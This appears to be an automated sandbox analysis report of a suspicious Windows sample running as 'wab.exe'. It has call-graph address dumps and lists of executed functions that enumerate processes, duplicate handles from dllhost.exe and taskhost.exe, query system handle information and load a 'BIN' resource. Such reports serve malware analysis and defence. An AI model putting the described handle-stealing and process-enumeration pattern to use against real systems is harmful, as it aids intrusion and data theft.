39965->39970 39971 43b4c8 39965->39971 39966 43b60f 39966->39912 40174 4393a5 17 API calls 39966->40174 39969 43af2f 40116 4233c5 16 API calls 39969->40116 40156 432878 12 API calls 39970->40156 39981 43b4f2 39971->39981 40162 42bbd5 memcpy memcpy memcpy memset memcpy 39971->40162 39973 43af51 40117 423426 11 API calls 39973->40117 39976 43af7d 40118 423426 11 API calls 39976->40118 39980 43af94 40119 423330 11 API calls 39980->40119 40163 43a76c 21 API calls 39981->40163 39982 43b529 40164 44081d 163 API calls 39982->40164 39983 43b462 40158 423330 11 API calls 39983->40158 39987 43b428 39987->39983 40157 432b60 16 API calls 39987->40157 39988 43afca 40120 423330 11 API calls 39988->40120 39989 43b47e 39993 43b497 39989->39993 40159 42374a memcpy memset memcpy memcpy memcpy 39989->40159 39990 43b544 39991 43b55c 39990->39991 40165 42c02e memset 39990->40165 40166 43a87a 163 API calls 39991->40166 40160 4233ae 11 API calls 39993->40160 39995 43afdb 40121 4233ae 11 API calls 39995->40121 39999 43b4b1 40161 423399 11 API calls 39999->40161 40001 43b56c 40004 43b58a 40001->40004 40167 423330 11 API calls 40001->40167 40003 43afee 40122 44081d 163 API calls 40003->40122 40168 440f84 12 API calls 40004->40168 40005 43b4c1 40170 42db80 163 API calls 40005->40170 40010 43b592 40169 43a82f 16 API calls 40010->40169 40013 43b5b4 40171 438c4e 163 API calls 40013->40171 40015 43b5cf 40172 42c02e memset 40015->40172 40017 43b005 40017->39912 40022 43b01f 40017->40022 40123 42d836 163 API calls 40017->40123 40018 43b1ef 40133 4233c5 16 API calls 40018->40133 40020 43b212 40134 423330 11 API calls 40020->40134 40022->40018 40131 423330 11 API calls 40022->40131 40132 42d71d 163 API calls 40022->40132 40024 43b087 40124 4233ae 11 API calls 40024->40124 40025 43add4 40025->39966 40173 438f86 16 API calls 40025->40173 40028 43b22a 40135 42ccb5 11 API calls 40028->40135 40031 43b23f 40136 4233ae 11 API calls 40031->40136 40032 43b10f 40127 423330 11 API calls 40032->40127 40034 43b257 40137 4233ae 11 API calls 40034->40137 40038 43b129 40128 4233ae 11 API calls 40038->40128 40039 43b26e 40138 4233ae 11 API calls 40039->40138 40042 43b09a 40042->40032 40125 42cc15 19 API calls 40042->40125 40126 4233ae 11 API calls 40042->40126 40043 43b282 40139 43a87a 163 API calls 40043->40139 40045 43b13c 40129 440f84 12 API calls 40045->40129 40047 43b29d 40140 423330 11 API calls 40047->40140 40050 43b2af 40053 43b2b8 40050->40053 40054 43b2ce 40050->40054 40051 43b15f 40130 4233ae 11 API calls 40051->40130 40141 4233ae 11 API calls 40053->40141 40142 440f84 12 API calls 40054->40142 40057 43b2c9 40144 4233ae 11 API calls 40057->40144 40058 43b2da 40143 42370b memset memcpy memset 40058->40143 40061 43b2f9 40145 423330 11 API calls 40061->40145 40063 43b30b 40146 423330 11 API calls 40063->40146 40065 43b325 40147 423399 11 API calls 40065->40147 40067 43b332 40148 4233ae 11 API calls 40067->40148 40069 43b354 40149 423399 11 API calls 40069->40149 40071 43b364 40150 43a82f 16 API calls 40071->40150 40073 43b370 40151 42db80 163 API calls 40073->40151 40075 43b380 40152 438c4e 163 API calls 40075->40152 40077 43b39e 40153 423399 11 API calls 40077->40153 40079 43b3ae 40154 43a76c 21 API calls 40079->40154 40081 43b3c3 40155 423399 11 API calls 40081->40155 40083->39904 40084->39907 40085->39909 40087 43a6f5 40086->40087 40089 43a765 40086->40089 40087->40089 40175 42a115 40087->40175 40089->39912 40095 4397fd memset 40089->40095 40092 43a73d 40092->40089 40093 42a115 147 API calls 40092->40093 40093->40089 40094->39914 40095->39921 40096->39912 40097->39936 40098->39925 40099->39929 40100->39926 40101->39930 40102->39934 40103->39938 40104->39940 40105->39943 40106->39950 40107->39949 40108->39954 40109->40025 40110->39947 40111->39955 40112->39958 40113->39959 40114->39959 40115->39969 40116->39973 40117->39976 40118->39980 40119->39988 40120->39995 40121->40003 40122->40017 40123->40024 40124->40042 40125->40042 40126->40042 40127->40038 40128->40045 40129->40051 40130->40022 40131->40022 40132->40022 40133->40020 40134->40028 40135->40031 40136->40034 40137->40039 40138->40043 40139->40047 40140->40050 40141->40057 40142->40058 40143->40057 40144->40061 40145->40063 40146->40065 40147->40067 40148->40069 40149->40071 40150->40073 40151->40075 40152->40077 40153->40079 40154->40081 40155->40025 40156->39987 40157->39983 40158->39989 40159->39993 40160->39999 40161->40005 40162->39981 40163->39982 40164->39990 40165->39991 40166->40001 40167->40004 40168->40010 40169->40005 40170->40013 40171->40015 40172->40025 40173->39966 40174->39912 40176 42a175 40175->40176 40178 42a122 40175->40178 40176->40089 40181 42b13b 147 API calls 40176->40181 40178->40176 40179 42a115 147 API calls 40178->40179 40182 43a174 40178->40182 40206 42a0a8 147 API calls 40178->40206 40179->40178 40181->40092 40196 43a196 40182->40196 40197 43a19e 40182->40197 40183 43a306 40183->40196 40226 4388c4 14 API calls 40183->40226 40186 42a115 147 API calls 40186->40197 40188 43a642 40188->40196 40230 4169a7 11 API calls 40188->40230 40192 43a635 40229 42c02e memset 40192->40229 40196->40178 40197->40183 40197->40186 40197->40196 40207 42ff8c 40197->40207 40215 415a91 40197->40215 40219 4165ff 40197->40219 40222 439504 13 API calls 40197->40222 40223 4312d0 147 API calls 40197->40223 40224 42be4c memcpy memcpy memcpy memset memcpy 40197->40224 40225 43a121 11 API calls 40197->40225 40199 4169a7 11 API calls 40200 43a325 40199->40200 40200->40188 40200->40192 40200->40196 40200->40199 40201 42b5b5 memset memcpy 40200->40201 40202 42bf4c 14 API calls 40200->40202 40205 4165ff 11 API calls 40200->40205 40227 42b63e 14 API calls 40200->40227 40228 42bfcf memcpy 40200->40228 40201->40200 40202->40200 40205->40200 40206->40178 40231 43817e 40207->40231 40209 42ff9d 40209->40197 40210 42ff99 40210->40209 40211 42ffe3 40210->40211 40212 42ffd0 40210->40212 40236 4169a7 11 API calls 40211->40236 40235 4169a7 11 API calls 40212->40235 40216 415a9d 40215->40216 40217 415ab3 40216->40217 40218 415aa4 memset 40216->40218 40217->40197 40218->40217 40385 4165a0 40219->40385 40222->40197 40223->40197 40224->40197 40225->40197 40226->40200 40227->40200 40228->40200 40229->40188 40230->40196 40232 438187 40231->40232 40234 438192 40231->40234 40237 4380f6 40232->40237 40234->40210 40235->40209 40236->40209 40239 43811f 40237->40239 40238 438164 40238->40234 40239->40238 40242 437e5e 40239->40242 40265 4300e8 memset memset memcpy 40239->40265 40266 437d3c 40242->40266 40244 437eb3 40244->40239 40245 437ea9 40245->40244 40250 437f22 40245->40250 40281 41f432 40245->40281 40248 437f06 40328 415c56 11 API calls 40248->40328 40252 437f7f 40250->40252 40253 432d4e 3 API calls 40250->40253 40251 437f95 40329 415c56 11 API calls 40251->40329 40252->40251 40254 43802b 40252->40254 40253->40252 40256 4165ff 11 API calls 40254->40256 40257 438054 40256->40257 40292 437371 40257->40292 40260 43806b 40261 438094 40260->40261 40330 42f50e 138 API calls 40260->40330 40264 437fa3 40261->40264 40331 4300e8 memset memset memcpy 40261->40331 40264->40244 40332 41f638 104 API calls 40264->40332 40265->40239 40267 437d69 40266->40267 40270 437d80 40266->40270 40333 437ccb 11 API calls 40267->40333 40269 437d76 40269->40245 40270->40269 40271 437da3 40270->40271 40272 437d90 40270->40272 40274 438460 134 API calls 40271->40274 40272->40269 40337 437ccb 11 API calls 40272->40337 40277 437dcb 40274->40277 40275 437de8 40336 424f26 123 API calls 40275->40336 40277->40275 40334 444283 13 API calls 40277->40334 40279 437dfc 40335 437ccb 11 API calls 40279->40335 40282 41f54d 40281->40282 40288 41f44f 40281->40288 40283 41f466 40282->40283 40367 41c635 memset memset 40282->40367 40283->40248 40283->40250 40288->40283 40290 41f50b 40288->40290 40338 41f1a5 40288->40338 40363 41c06f memcmp 40288->40363 40364 41f3b1 90 API calls 40288->40364 40365 41f398 86 API calls 40288->40365 40290->40282 40290->40283 40366 41c295 86 API calls 40290->40366 40368 41703f 40292->40368 40294 437399 40295 43739d 40294->40295 40297 4373ac 40294->40297 40375 4446ea 11 API calls 40295->40375 40298 416935 16 API calls 40297->40298 40299 4373ca 40298->40299 40300 438460 134 API calls 40299->40300 40305 4251c4 137 API calls 40299->40305 40309 415a91 memset 40299->40309 40312 43758f 40299->40312 40324 437584 40299->40324 40327 437d3c 135 API calls 40299->40327 40376 425433 13 API calls 40299->40376 40377 425413 17 API calls 40299->40377 40378 42533e 16 API calls 40299->40378 40379 42538f 16 API calls 40299->40379 40380 42453e 123 API calls 40299->40380 40300->40299 40301 4375bc 40303 415c7d 16 API calls 40301->40303 40304 4375d2 40303->40304 40306 4442e6 11 API calls 40304->40306 40326 4373a7 40304->40326 40305->40299 40307 4375e2 40306->40307 40307->40326 40383 444283 13 API calls 40307->40383 40309->40299 40381 42453e 123 API calls 40312->40381 40315 4375f4 40318 437620 40315->40318 40319 43760b 40315->40319 40317 43759f 40320 416935 16 API calls 40317->40320 40322 416935 16 API calls 40318->40322 40384 444283 13 API calls 40319->40384 40320->40324 40322->40326 40324->40301 40382 42453e 123 API calls 40324->40382 40325 437612 memcpy 40325->40326 40326->40260 40327->40299 40328->40244 40329->40264 40330->40261 40331->40264 40332->40244 40333->40269 40334->40279 40335->40275 40336->40269 40337->40269 40339 41bc3b 101 API calls 40338->40339 40340 41f1b4 40339->40340 40341 41edad 86 API calls 40340->40341 40348 41f282 40340->40348 40342 41f1cb 40341->40342 40343 41f1f5 memcmp 40342->40343 40344 41f20e 40342->40344 40342->40348 40343->40344 40345 41f21b memcmp 40344->40345 40344->40348 40346 41f326 40345->40346 40349 41f23d 40345->40349 40347 41ee6b 86 API calls 40346->40347 40346->40348 40347->40348 40348->40288 40349->40346 40350 41f28e memcmp 40349->40350 40352 41c8df 56 API calls 40349->40352 40350->40346 40351 41f2a9 40350->40351 40351->40346 40354 41f308 40351->40354 40355 41f2d8 40351->40355 40353 41f269 40352->40353 40353->40346 40356 41f287 40353->40356 40357 41f27a 40353->40357 40354->40346 40361 4446ce 11 API calls 40354->40361 40358 41ee6b 86 API calls 40355->40358 40356->40350 40359 41ee6b 86 API calls 40357->40359 40360 41f2e0 40358->40360 40359->40348 40362 41b1ca memset 40360->40362 40361->40346 40362->40348 40363->40288 40364->40288 40365->40288 40366->40282 40367->40283 40369 417044 40368->40369 40370 41705c 40368->40370 40372 416760 11 API calls 40369->40372 40374 417055 40369->40374 40371 417075 40370->40371 40373 41707a 11 API calls 40370->40373 40371->40294 40372->40374 40373->40369 40374->40294 40375->40326 40376->40299 40377->40299 40378->40299 40379->40299 40380->40299 40381->40317 40382->40301 40383->40315 40384->40325 40390 415cfe 40385->40390 40395 415d23 __aullrem __aulldvrm 40390->40395 40397 41628e 40390->40397 40391 4163ca 40404 416422 11 API calls 40391->40404 40393 416422 10 API calls 40393->40395 40394 416172 memset 40394->40395 40395->40391 40395->40393 40395->40394 40396 415cb9 10 API calls 40395->40396 40395->40397 40396->40395 40398 416520 40397->40398 40399 416527 40398->40399 40403 416574 40398->40403 40401 416544 40399->40401 40399->40403 40405 4156aa 11 API calls 40399->40405 40402 416561 memcpy 40401->40402 40401->40403 40402->40403 40403->40197 40404->40397 40405->40401 40437 41493c EnumResourceNamesW 37678 4287c1 37679 4287d2 37678->37679 37680 429ac1 37678->37680 37681 428818 37679->37681 37682 42881f 37679->37682 37688 425711 37679->37688 37693 425ad6 37680->37693 37748 415c56 11 API calls 37680->37748 37715 42013a 37681->37715 37743 420244 97 API calls 37682->37743 37687 4260dd 37742 424251 120 API calls 37687->37742 37688->37680 37690 4259da 37688->37690 37696 422aeb memset memcpy memcpy 37688->37696 37697 429a4d 37688->37697 37700 4260a1 37688->37700 37711 4259c2 37688->37711 37714 425a38 37688->37714 37731 4227f0 memset memcpy 37688->37731 37732 422b84 15 API calls 37688->37732 37733 422b5d memset memcpy memcpy 37688->37733 37734 422640 13 API calls 37688->37734 37736 4241fc 11 API calls 37688->37736 37737 42413a 90 API calls 37688->37737 37741 416760 11 API calls 37690->37741 37696->37688 37698 429a66 37697->37698 37702 429a9b 37697->37702 37744 415c56 11 API calls 37698->37744 37740 415c56 11 API calls 37700->37740 37703 429a96 37702->37703 37746 416760 11 API calls 37702->37746 37747 424251 120 API calls 37703->37747 37706 429a7a 37745 416760 11 API calls 37706->37745 37711->37693 37735 415c56 11 API calls 37711->37735 37714->37711 37738 422640 13 API calls 37714->37738 37739 4226e0 12 API calls 37714->37739 37716 42014c 37715->37716 37719 420151 37715->37719 37758 41e466 97 API calls 37716->37758 37718 420162 37718->37688 37719->37718 37720 4201b3 37719->37720 37721 420229 37719->37721 37722 4201b8 37720->37722 37723 4201dc 37720->37723 37721->37718 37724 41fd5e 86 API calls 37721->37724 37749 41fbdb 37722->37749 37723->37718 37727 4201ff 37723->37727 37755 41fc4c 37723->37755 37724->37718 37727->37718 37730 42013a 97 API calls 37727->37730 37730->37718 37731->37688 37732->37688 37733->37688 37734->37688 37735->37690 37736->37688 37737->37688 37738->37714 37739->37714 37740->37690 37741->37687 37742->37693 37743->37688 37744->37706 37745->37703 37746->37703 37747->37680 37748->37690 37750 41fbf1 37749->37750 37751 41fbf8 37749->37751 37754 41fc39 37750->37754 37773 4446ce 11 API calls 37750->37773 37763 41ee26 37751->37763 37754->37718 37759 41fd5e 37754->37759 37756 41ee6b 86 API calls 37755->37756 37757 41fc5d 37756->37757 37757->37723 37758->37719 37761 41fd65 37759->37761 37760 41fdab 37760->37718 37761->37760 37762 41fbdb 86 API calls 37761->37762 37762->37761 37764 41ee41 37763->37764 37765 41ee32 37763->37765 37774 41edad 37764->37774 37777 4446ce 11 API calls 37765->37777 37768 41ee3c 37768->37750 37771 41ee58 37771->37768 37779 41ee6b 37771->37779 37773->37754 37783 41be52 37774->37783 37777->37768 37778 41eb85 11 API calls 37778->37771 37780 41ee70 37779->37780 37781 41ee78 37779->37781 37839 41bf99 86 API calls 37780->37839 37781->37768 37784 41be6f 37783->37784 37785 41be5f 37783->37785 37791 41be8c 37784->37791 37804 418c63 37784->37804 37818 4446ce 11 API calls 37785->37818 37788 41be69 37788->37768 37788->37778 37789 41bee7 37789->37788 37822 41a453 86 API calls 37789->37822 37791->37788 37791->37789 37792 41bf3a 37791->37792 37795 41bed1 37791->37795 37821 4446ce 11 API calls 37792->37821 37794 41bef0 37794->37789 37797 41bf01 37794->37797 37795->37794 37798 41bee2 37795->37798 37796 41bf24 memset 37796->37788 37797->37796 37799 41bf14 37797->37799 37819 418a6d memset memcpy memset 37797->37819 37808 41ac13 37798->37808 37820 41a223 memset memcpy memset 37799->37820 37803 41bf20 37803->37796 37807 418c72 37804->37807 37805 418c94 37805->37791 37806 418d51 memset memset 37806->37805 37807->37805 37807->37806 37809 41ac52 37808->37809 37810 41ac3f memset 37808->37810 37813 41ac6a 37809->37813 37823 41dc14 19 API calls 37809->37823 37811 41acd9 37810->37811 37811->37789 37815 41aca1 37813->37815 37824 41519d 37813->37824 37815->37811 37816 41acc0 memset 37815->37816 37817 41accd memcpy 37815->37817 37816->37811 37817->37811 37818->37788 37819->37799 37820->37803 37821->37789 37823->37813 37827 4175ed 37824->37827 37835 417570 SetFilePointer 37827->37835 37830 41760a ReadFile 37831 417637 37830->37831 37832 417627 GetLastError 37830->37832 37833 4151b3 37831->37833 37834 41763e memset 37831->37834 37832->37833 37833->37815 37834->37833 37836 4175b2 37835->37836 37837 41759c GetLastError 37835->37837 37836->37830 37836->37833 37837->37836 37838 4175a8 GetLastError 37837->37838 37838->37836 37839->37781 37840 417bc5 37842 417c61 37840->37842 37846 417bda 37840->37846 37841 417bf6 UnmapViewOfFile CloseHandle 37841->37841 37841->37846 37844 417c2c 37844->37846 37852 41851e 20 API calls 37844->37852 37846->37841 37846->37842 37846->37844 37847 4175b7 37846->37847 37848 4175d6 FindCloseChangeNotification 37847->37848 37849 4175c8 37848->37849 37850 4175df 37848->37850 37849->37850 37851 4175ce Sleep 37849->37851 37850->37846 37851->37848 37852->37844 39886 4147f3 39889 414561 39886->39889 39888 414813 39890 41456d 39889->39890 39891 41457f GetPrivateProfileIntW 39889->39891 39894 4143f1 memset _itow WritePrivateProfileStringW 39890->39894 39891->39888 39893 41457a 39893->39888 39894->39893

                                                Executed Functions

                                                Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 360 40de6e-40de71 359->360 360->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 377 40dffd-40e006 372->377 373->363 373->377 375 40df08 374->375 376 40dfef-40dff2 CloseHandle 374->376 378 40df0b-40df10 375->378 376->373 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->376 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                APIs
                                                • memset.MSVCRT ref: 0040DDAD
                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                • memset.MSVCRT ref: 0040DF5F
                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                • API String ID: 594330280-3398334509
                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 ??3@YAXPAX@Z 643->646 648 413edb-413ee2 645->648 646->648 652 413ee4 648->652 653 413ee7-413efe 648->653 662 413ea2-413eae CloseHandle 650->662 656 413e61-413e68 651->656 657 413e37-413e44 GetModuleHandleW 651->657 652->653 653->638 656->650 659 413e6a-413e76 656->659 657->656 658 413e46-413e5c GetProcAddress 657->658 658->656 659->650 662->641
                                                APIs
                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                • memset.MSVCRT ref: 00413D7F
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                • memset.MSVCRT ref: 00413E07
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                • API String ID: 912665193-1740548384
                                                • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                • memcpy.MSVCRT ref: 0040B60D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                • String ID: BIN
                                                • API String ID: 1668488027-1015027815
                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                • String ID:
                                                • API String ID: 2947809556-0
                                                • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FileFind$FirstNext
                                                • String ID:
                                                • API String ID: 1690352074-0
                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0041898C
                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
